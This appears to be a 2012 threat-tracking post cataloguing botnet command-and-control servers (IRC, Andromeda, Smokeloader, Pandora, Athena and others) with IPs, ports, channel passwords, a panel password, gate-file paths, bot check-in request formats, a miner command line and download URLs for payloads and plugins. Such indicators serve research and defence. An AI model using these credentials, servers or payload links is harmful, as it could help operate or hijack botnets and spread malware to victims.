Resolved: [dns.domain-crawlers.com] to [212.48.121.103]
bitcoin-miner.exe -a 60 -l no -o hxxp://dns.domain-crawlers.com:8332/ -u haqidodges@gmail.com -p password
the guy using this shit is a real hecker he uses gmail lol
sample bitcoin-miner
Hosting infos: http://whois.domaintools.com/212.48.121.103
aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)
Resolved aminakoyim.co.cc to 46.246.93.77
Server: aminakoyim.co.cc
Port: 6667
Password: timu
Channel: #NGR
* Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe
* Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012
All users are auto joined to #debug# on connect
* Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1
* ...
cdn.barracudasec.com (Barracuda http bot hosted by Seychelles Victoria Business Dialogue Ltd)
Resolved cdn.barracudasec.com to 91.217.178.192
Server: cdn.barracudasec.com
Gate file: /bot.php
http://cdn.barracudasec.com/images/logo.png
Bot GET requests look like this:
/bot.php?ip=0.0.0.0&os=Microsoft Windows xp&name=FBI-PC&id=Federal agent-barracuda version
Bots will get ip from checkip.dyndns.com or api.wipmania.com
Hint: $ip= $REMOTE_ADDR
Hosting infos: http://whois.domaintools.com/91.217.178.192
Another panel is located at xn--y0h.co.cc. This one is on a different host.
http://xn--y0h.co.cc/images/logo.png
Hosting infos: http://whois.domaintools.com/37.0.124.66
diablothreecracked.in (Smokeloader hosted by Luxembourg Luxembourg Root Sa)
Resolved diablothreecracked.in to 94.242.199.145
Zain got himself a new smokeloader.
Server: diablothreecracked.in
Gate file: /index.php
He left the zip containing the panel and original exe up on the host: hxxp://diablothreecracked.in/smoke.zip
Here it is if he notices and takes it down
hxxp://diablothreecracked.in/install.php is still up as well.
Hosting infos: http://whois.domaintools.com/94.242.199.145
zqpoetyafw.org (Chebri bot hosted by Canada Affilnet Corporation)
Resolved zqpoetyafw.org to 108.63.14.21
Server: zqpoetyafw.org
Port: 20001
Note: Not an irc. Don’t waste your time trying to connect.
This is one of snk’s bots. It’s being loaded from his irc.
* Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html
* Topic for #load set by lol at Mon Nov 05 ...
5.231.22.188 (Athena bot hosted in Germany Bad Homburg Vor Der Hohe Ghostnet Network Used For Vps Hosting Services)
Sample comes from djmetral, thnx to him
Server: 5.231.22.188:6667
Nickname: [A|W_XP|2]cznug
Username: 18129
Channel: (Password: )
The executable is bound with another bot on the same server
Nick: hAtbLaDe”;
Username: 27867
Channel: #Support”;
Channel: #Lobby,#IRCd”;
Channel: #l34k
Channel: #IRCd,#Support,#main with Password letmein,somepass,anotherpass”;
Private Message to User VHOST”;: “VHOST”;”
#army is the channel for ddos bots(pBots) here the ...
rtu.jgieo445.in (irc bot hosted in United States London Santrex Internet Services Ltd.)
server rtu.jgieo445.in
PASS 0
port 4707
channel: #botnet (thnx to anonymous guy for finding the channel)
NICK [A|W_XP|x32|D]tilcbb
USER 23637 8 * :23637
Local users: Current Local Users: 53 Max: 517
Global users: Current Global Users: 53 Max: 517
I don't have the exe to find channels, feel free to discover them
hosting infos: ...
mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)
Resolved mirror.serverhalflife.com to 95.211.209.178
Pandora ddos bot
Server: mirror.serverhalflife.com
Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m
Other crap on the server
Microworm panel: mirror.serverhalflife.com/micro/
The password is “root”
Files are located at hxxp://mirror.serverhalflife.com/files/
blackdra.exe is blackshades
Connects to own3d-private.no-ip.org:4010
Blackshades downloads more of the files
x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn FBI access panel (Welcome Agent ...
vvv.exp1oit.in (Andromeda http hosted by France Roubaix Ovh Sas)
Resolved vvv.exp1oit.in to 178.33.241.61
This is the new andromeda of the french guy. It is the full version with all of the plugins.
Server: vvv.exp1oit.in
Gate file: /google/image.php
Plugins:
Formgrabber: beautyoftheworld.ca/xs/f.pack
Gate file: /google/fg.php
Socks: beautyoftheworld.ca/xs/s.pack
Rootkit: beautyoftheworld.ca/xs/r.pack
Downloads files from hxxp://jamboproducciones.com/xs/ and hxxp://ez-cs.net/dk/
He also has a new smoke loader up
Server: smk.cheatgame.org
Gate ...
ultimatecore.info (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved ultimatecore.info to 91.231.84.114
New andromeda from this guy.
Server: ultimatecore.info
Gate file: /mario/root.php
This is the full version of andromeda, with all of the plugins.
Plugins:
Formgrabber plugin: ultimatecore.info/test/f.pack
Gate file: /mario/fg.php
Socks plugin: ultimatecore.info/test/s.pack
Rootkit plugin: ultimatecore.info/test/r.pack
Hosting infos: http://whois.domaintools.com/91.231.84.114
Edit: Plugins are now at ultimatecore.info/samuelkaptioalpha1/
I think you can guess what each ...